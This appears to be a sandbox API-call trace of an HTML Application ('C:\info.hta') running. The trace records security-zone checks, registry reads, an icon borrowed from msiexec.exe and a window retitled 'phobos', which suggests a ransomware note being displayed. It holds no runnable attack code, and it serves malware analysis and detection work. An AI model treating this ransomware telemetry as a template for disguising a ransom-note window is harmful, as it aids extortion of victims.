[0226.955] IsCharSpaceW (wch=0x49) returned 0 [0226.955] IsCharSpaceW (wch=0x4f) returned 0 [0226.955] IsCharSpaceW (wch=0x4e) returned 0 [0226.955] IsCharSpaceW (wch=0x29) returned 0 [0226.955] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x36) returned 0x5cf880 [0226.955] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5cf128 [0226.955] IsCharSpaceW (wch=0x0) returned 0 [0226.955] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cf880 | out: hHeap=0x590000) returned 1 [0226.955] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cf128 | out: hHeap=0x590000) returned 1 [0226.955] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.955] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x5ffdc0 [0226.955] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x5ffde0 [0226.955] IsCharSpaceW (wch=0x75) returned 0 [0226.955] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0226.955] IsCharSpaceW (wch=0x28) returned 0 [0226.955] IsCharSpaceW (wch=0x23) returned 0 [0226.955] IsCharSpaceW (wch=0x23) returned 0 [0226.955] IsCharSpaceW (wch=0x64) returned 0 [0226.955] IsCharSpaceW (wch=0x65) returned 0 [0226.955] IsCharSpaceW (wch=0x66) returned 0 [0226.955] IsCharSpaceW (wch=0x61) returned 0 [0226.955] IsCharSpaceW (wch=0x75) returned 0 [0226.955] IsCharSpaceW (wch=0x6c) returned 0 [0226.955] IsCharSpaceW (wch=0x74) returned 0 [0226.955] IsCharSpaceW (wch=0x23) returned 0 [0226.955] IsCharSpaceW (wch=0x41) returned 0 [0226.955] IsCharSpaceW (wch=0x50) returned 0 [0226.955] IsCharSpaceW (wch=0x50) returned 0 [0226.955] IsCharSpaceW (wch=0x4c) returned 0 [0226.955] IsCharSpaceW (wch=0x49) returned 0 [0226.955] IsCharSpaceW (wch=0x43) returned 0 [0226.955] IsCharSpaceW (wch=0x41) returned 0 [0226.955] IsCharSpaceW (wch=0x54) returned 0 [0226.955] IsCharSpaceW (wch=0x49) returned 0 [0226.956] IsCharSpaceW (wch=0x4f) returned 0 [0226.956] IsCharSpaceW (wch=0x4e) returned 0 [0226.956] IsCharSpaceW (wch=0x29) returned 0 [0226.956] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x36) returned 0x5cf880 [0226.956] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5cf0e0 [0226.956] IsCharSpaceW (wch=0x0) returned 0 [0226.956] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5dec90 [0226.956] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4128, Size=0x60) returned 0x5e1c00 [0226.956] CoInternetIsFeatureEnabled (FeatureEntry=0x6, dwFlags=0x2) returned 0x0 [0226.971] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0226.971] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ed4ac, dwFlags=0x0 | out: pdwZone=0x1ed4ac*=0xffffffff) returned 0x800c0011 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.971] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x2000, pPolicy=0x1ed4b0, cbPolicy=0x4, pContext=0x5cf88c*=0x23, cbContext=0x2a, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x1ed4b0*=0x0) returned 0x0 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.971] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0226.971] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x50) returned 0x5ce520 [0226.971] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x34) returned 0x5cf8c0 [0226.971] StrChrW (lpStart="default#APPLICATION", wMatch=0x23) returned="#APPLICATION" [0226.971] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12) returned 0x5ffdc0 [0226.971] StrChrW (lpStart="default", wMatch=0x23) returned 0x0 [0226.971] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa8) returned 0x5d7f48 [0226.971] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.971] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x16) returned 0x5ffe00 [0226.972] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5ffe20 [0226.972] GetCurrentThreadId () returned 0x36c [0226.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5cef30 [0226.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x604348 [0226.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x94) returned 0x5cbe30 [0226.972] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa8) returned 0x5cbed0 [0226.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2e) returned 0x5ad888 [0226.972] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0226.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5ffe40 [0226.972] GetCurrentThreadId () returned 0x36c [0226.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x32) returned 0x5cf900 [0226.972] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ffdc0 | out: hHeap=0x590000) returned 1 [0226.972] StrChrW (lpStart="default#APPLICATION", wMatch=0x23) returned="#APPLICATION" [0226.973] GetProcAddress (hModule=0x76340000, lpProcName=0x2) returned 0x76344642 [0226.973] StrCmpICW (pszStr1="APPLICATION", pszStr2="Application") returned 0 [0226.973] GetCurrentThreadId () returned 0x36c [0226.973] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x5d0a88 [0226.973] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5ffdc0 [0226.973] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1e) returned 0x6042a8 [0226.973] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a4128 [0226.973] GetCurrentThreadId () returned 0x36c [0226.973] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.973] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.973] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76340000 [0226.973] GetProcAddress (hModule=0x76340000, lpProcName="VariantClear") returned 0x76343eae [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.974] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.975] GetCurrentThreadId () returned 0x36c [0226.975] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x5d0ae8 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] GetCurrentThreadId () returned 0x36c [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.004] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.005] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.005] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.005] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.005] GetCurrentThreadId () returned 0x36c [0227.005] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.005] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.005] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5ffe60 [0227.005] CreateUri (in: pwzURI="msiexec.exe", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ed4a8 | out: ppURI=0x1ed4a8*=0x5bbe34) returned 0x0 [0227.005] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ed338 | out: ppu=0x1ed338) returned 0x0 [0227.005] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ed3f4 | out: ppURI=0x1ed3f4*=0x5bbf0c) returned 0x0 [0227.005] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed3bc | out: ppvObject=0x1ed3bc*=0x5bbf0c) returned 0x0 [0227.005] IUnknown:Release (This=0x5bbf0c) returned 0xb [0227.005] IUnknown:AddRef (This=0x5bbf0c) returned 0xc [0227.023] CoInternetCombineIUri (in: pBaseUri=0x5bbf0c, pRelativeUri=0x5bbe34, dwCombineFlags=0x6000000, ppCombinedUri=0x1ed428, dwReserved=0x0 | out: ppCombinedUri=0x1ed428*=0x5bce3c) returned 0x0 [0227.023] IUnknown:Release (This=0x5bbf0c) returned 0xc [0227.023] IUnknown:Release (This=0x5bbf0c) returned 0xb [0227.023] IUnknown:QueryInterface (in: This=0x5bce3c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed37c | out: ppvObject=0x1ed37c*=0x5bce3c) returned 0x0 [0227.024] IUnknown:Release (This=0x5bce3c) returned 0x2 [0227.024] IUnknown:AddRef (This=0x5bce3c) returned 0x3 [0227.024] IUri:GetAbsoluteUri (in: This=0x5bce3c, pbstrAbsoluteUri=0x1ed370 | out: pbstrAbsoluteUri=0x1ed370*="file:///C:/msiexec.exe") returned 0x0 [0227.024] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xcc) returned 0x5bcf08 [0227.024] IUnknown:AddRef (This=0x5bce3c) returned 0x4 [0227.024] IUnknown:QueryInterface (in: This=0x5bce3c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed34c | out: ppvObject=0x1ed34c*=0x5bce3c) returned 0x0 [0227.024] IUnknown:Release (This=0x5bce3c) returned 0x4 [0227.024] IUnknown:AddRef (This=0x5bce3c) returned 0x5 [0227.024] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x6045c8 [0227.024] IUnknown:Release (This=0x5bce3c) returned 0x4 [0227.024] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5dc790 [0227.024] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5decf0 [0227.024] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0xb4) returned 0x0 [0227.024] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed2fc | out: phkResult=0x1ed2fc*=0x154) returned 0x0 [0227.024] RegOpenKeyExW (in: hKey=0x154, lpSubKey="FEATURE_SUBDOWNLOAD_LOCKDOWN", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed2b8 | out: phkResult=0x1ed2b8*=0x0) returned 0x2 [0227.025] RegOpenKeyExW (in: hKey=0xb4, lpSubKey="FEATURE_SUBDOWNLOAD_LOCKDOWN", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed2b8 | out: phkResult=0x1ed2b8*=0x23c) returned 0x0 [0227.025] SHRegGetValueW () returned 0x2 [0227.025] SHRegGetValueW () returned 0x2 [0227.025] RegCloseKey (hKey=0x23c) returned 0x0 [0227.025] RegCloseKey (hKey=0x0) returned 0x6 [0227.025] RegCloseKey (hKey=0x0) returned 0x6 [0227.025] RegCloseKey (hKey=0xb4) returned 0x0 [0227.025] RegCloseKey (hKey=0x154) returned 0x0 [0227.025] IInternetSecurityManager:MapUrlToZone (in: This=0x5c2540, pwszUrl="file:///C:/info.hta", pdwZone=0x1ed388, dwFlags=0x0 | out: pdwZone=0x1ed388*=0x0) returned 0x0 [0227.025] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b0) returned 0x5fda10 [0227.025] IUnknown:QueryInterface (in: This=0x5bce3c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed084 | out: ppvObject=0x1ed084*=0x5bce3c) returned 0x0 [0227.025] IUnknown:Release (This=0x5bce3c) returned 0x4 [0227.025] IUnknown:AddRef (This=0x5bce3c) returned 0x5 [0227.025] ParseURLW (in: pcszURL="file:///C:/msiexec.exe", ppu=0x1ed048 | out: ppu=0x1ed048) returned 0x0 [0227.025] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2e) returned 0x5d8480 [0227.025] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2e) returned 0x5d84b8 [0227.026] CoInternetParseUrl (in: pwzUrl="file:///C:/msiexec.exe", ParseAction=0x9, dwFlags=0x0, pszResult=0x5d8480, cchResult=0x17, pcchResult=0x1ed054, dwReserved=0x0 | out: pszResult="C:\\msiexec.exe", pcchResult=0x1ed054) returned 0x0 [0227.026] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d84b8 | out: hHeap=0x590000) returned 1 [0227.026] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8480 | out: hHeap=0x590000) returned 1 [0227.026] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.026] IUnknown:AddRef (This=0x5bce3c) returned 0x6 [0227.026] IUnknown:AddRef (This=0x5bce3c) returned 0x7 [0227.026] IUnknown:QueryInterface (in: This=0x5bce3c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed078 | out: ppvObject=0x1ed078*=0x5bce3c) returned 0x0 [0227.026] IUnknown:Release (This=0x5bce3c) returned 0x7 [0227.026] IUnknown:AddRef (This=0x5bce3c) returned 0x8 [0227.026] IUri:GetScheme (in: This=0x5bce3c, pdwScheme=0x5fdb18 | out: pdwScheme=0x5fdb18*=0x9) returned 0x0 [0227.026] CoInternetParseIUri (in: pIUri=0x5bce3c, ParseAction=0x9, dwFlags=0x0, pwzResult=0x1ed0f0, cchResult=0x104, pcchResult=0x1ed094, dwReserved=0x0 | out: pwzResult="C:\\msiexec.exe", pcchResult=0x1ed094) returned 0x0 [0227.026] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x22) returned 0x5d0b18 [0227.026] FindFirstFileW (in: lpFileName="C:\\msiexec.exe", lpFindFileData=0x1ece20 | out: lpFindFileData=0x1ece20) returned 0xffffffff [0227.026] IUnknown:QueryInterface (in: This=0x5bce3c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed084 | out: ppvObject=0x1ed084*=0x5bce3c) returned 0x0 [0227.026] IUnknown:Release (This=0x5bce3c) returned 0x8 [0227.026] IUnknown:AddRef (This=0x5bce3c) returned 0x9 [0227.026] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x5fd718 [0227.026] IInternetSession:CreateBinding (in: This=0x5c5628, pbc=0x0, szUrl="file:///C:/msiexec.exe", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x5fd720, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x5fd720*=0x5d1360) returned 0x0 [0227.026] IUnknown:QueryInterface (in: This=0x5d1360, riid=0x74096078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x1ed008 | out: ppvObject=0x1ed008*=0x0) returned 0x80004002 [0227.026] IUnknown:QueryInterface (in: This=0x5d1360, riid=0x74096068*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1ed018 | out: ppvObject=0x1ed018*=0x5d1370) returned 0x0 [0227.026] IInternetPriority:SetPriority (This=0x5d1370, nPriority=-1) returned 0x0 [0227.026] IUnknown:Release (This=0x5d1370) returned 0x1 [0227.026] IUnknown:AddRef (This=0x5d1360) returned 0x2 [0227.026] IUnknown:QueryInterface (in: This=0x5d1360, riid=0x74096158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x1ed04c | out: ppvObject=0x1ed04c*=0x5d1360) returned 0x0 [0227.027] IInternetProtocolEx:StartEx (This=0x5d1360, pUri=0x5bce3c, pOIProtSink=0x5fda64, pOIBindInfo=0x5fda2c, grfPI=0x10, dwReserved=0x0) returned 0x800c0005 [0227.027] IUnknown:AddRef (This=0x5fda64) returned 0x3 [0227.027] IUnknown:AddRef (This=0x5fda2c) returned 0x4 [0227.027] IUnknown:QueryInterface (in: This=0x5fda2c, riid=0x75326f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x1ecff4 | out: ppvObject=0x1ecff4*=0x0) returned 0x80004002 [0227.027] IInternetBindInfo:GetBindInfo (in: This=0x5fda2c, grfBINDF=0x5d14d0, pbindinfo=0x5d14d8 | out: grfBINDF=0x5d14d0*=0x20083, pbindinfo=0x5d14d8) returned 0x0 [0227.027] IUnknown:AddRef (This=0x5fda64) returned 0x5 [0227.027] IInternetProtocolSink:ReportProgress (This=0x5fda64, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0 [0227.027] IInternetProtocolSink:ReportProgress (This=0x5fda64, ulStatusCode=0xb, szStatusText="") returned 0x0 [0227.027] IInternetProtocolSink:ReportResult (This=0x5fda64, hrResult=0x800c0005, dwError=0x2, szResult=0x0) returned 0x0 [0227.027] IInternetProtocolRoot:Terminate (This=0x5d1360, dwOptions=0x0) returned 0x0 [0227.027] IUnknown:Release (This=0x5fda2c) returned 0x4 [0227.027] IUnknown:Release (This=0x5fda64) returned 0x3 [0227.027] IUnknown:Release (This=0x5fda64) returned 0x2 [0227.027] IUnknown:Release (This=0x5d1360) returned 0x2 [0227.028] IUnknown:Release (This=0x5bce3c) returned 0xa [0227.028] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0227.028] GetIUriPriv () returned 0x0 [0227.028] IUnknown:Release (This=0x5bc0bc) returned 0x3 [0227.028] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0227.028] IUnknown:Release (This=0x5bce3c) returned 0x9 [0227.028] IUnknown:Release (This=0x5bce3c) returned 0x8 [0227.028] CoTaskMemFree (pv=0x0) [0227.028] GetCurrentThreadId () returned 0x36c [0227.028] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0227.028] GetIUriPriv () returned 0x0 [0227.028] IUnknown:Release (This=0x5bc0bc) returned 0x3 [0227.028] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0227.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.028] IUnknown:Release (This=0x5bce3c) returned 0x7 [0227.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.028] IUnknown:Release (This=0x5d1360) returned 0x1 [0227.028] IUnknown:Release (This=0x5d1360) returned 0x0 [0227.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fd718 | out: hHeap=0x590000) returned 1 [0227.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.028] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.028] IUnknown:Release (This=0x5bce3c) returned 0x4 [0227.029] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d0b18 | out: hHeap=0x590000) returned 1 [0227.029] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fda10 | out: hHeap=0x590000) returned 1 [0227.029] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5decf0 | out: hHeap=0x590000) returned 1 [0227.029] IUnknown:Release (This=0x5bce3c) returned 0x3 [0227.029] IUnknown:Release (This=0x5bbe34) returned 0x2 [0227.029] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x604618 [0227.029] GetWindowTextW (in: hWnd=0x20160, lpString=0x1ec5d8, nMaxCount=512 | out: lpString="C:\\info.hta") returned 11 [0227.029] NtdllDefWindowProc_W () returned 0xb [0227.029] SetWindowTextW (hWnd=0x20160, lpString="phobos") returned 1 [0227.029] NtdllDefWindowProc_W () returned 0x1 [0227.029] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75450000 [0227.029] GetProcAddress (hModule=0x75450000, lpProcName="ExtractIconW") returned 0x7555dd1c [0227.030] ExtractIconW (hInst=0xb40000, lpszExeFileName="msiexec.exe", nIconIndex=0x0) returned 0x10197 [0227.200] SendMessageW (hWnd=0x40110, Msg=0x80, wParam=0x1, lParam=0x10197) returned 0x0 [0227.200] NtdllDefWindowProc_W () returned 0x0 [0227.201] NtdllDefWindowProc_W () returned 0x0 [0227.201] NtdllDefWindowProc_W () returned 0x0 [0227.202] SendMessageW (hWnd=0x20160, Msg=0x80, wParam=0x0, lParam=0x10197) returned 0x0 [0227.202] NtdllDefWindowProc_W () returned 0x0 [0227.202] SetWindowLongW (hWnd=0x20160, nIndex=-16, dwNewLong=13041664) returned -2033254400 [0227.202] NtdllDefWindowProc_W () returned 0x0 [0227.202] NtdllDefWindowProc_W () returned 0x0 [0227.272] SetWindowLongW (hWnd=0x20160, nIndex=-20, dwNewLong=262144) returned 262400 [0227.272] NtdllDefWindowProc_W () returned 0x0 [0227.272] NtdllDefWindowProc_W () returned 0x0 [0227.272] SetWindowPos (hWnd=0x20160, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0227.272] NtdllDefWindowProc_W () returned 0x0 [0227.272] NtdllDefWindowProc_W () returned 0x0 [0227.272] NtdllDefWindowProc_W () returned 0x0 [0227.273] GlobalAddAtomW (lpString=0x0) returned 0x0 [0227.273] SetPropW (hWnd=0x40110, lpString=0x0, hData=0x40110) returned 0 [0227.273] ShowWindow (hWnd=0x20160, nCmdShow=1) returned 0 [0227.273] NtdllDefWindowProc_W () returned 0x0 [0227.273] NtdllDefWindowProc_W () returned 0x0 [0227.273] NtdllDefWindowProc_W () returned 0x0 [0227.275] NtdllDefWindowProc_W () returned 0x0 [0227.276] NtdllDefWindowProc_W () returned 0x1 [0227.276] NtdllDefWindowProc_W () returned 0x0 [0227.276] GetClientRect (in: hWnd=0x20160, lpRect=0x1ed2c0 | out: lpRect=0x1ed2c0) returned 1 [0227.276] GetClientRect (in: hWnd=0x20160, lpRect=0x1ed2c0 | out: lpRect=0x1ed2c0) returned 1 [0227.276] NtdllDefWindowProc_W () returned 0x0 [0227.276] UpdateWindow (hWnd=0x20160) [0227.276] NtdllDefWindowProc_W () returned 0x0 [0227.276] GetWindowLongW (hWnd=0x3016a, nIndex=-21) returned 6035024 [0227.277] SetBrushOrgEx (in: hdc=0xb0101dd, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.277] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.277] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.277] MulDiv (nNumber=2, 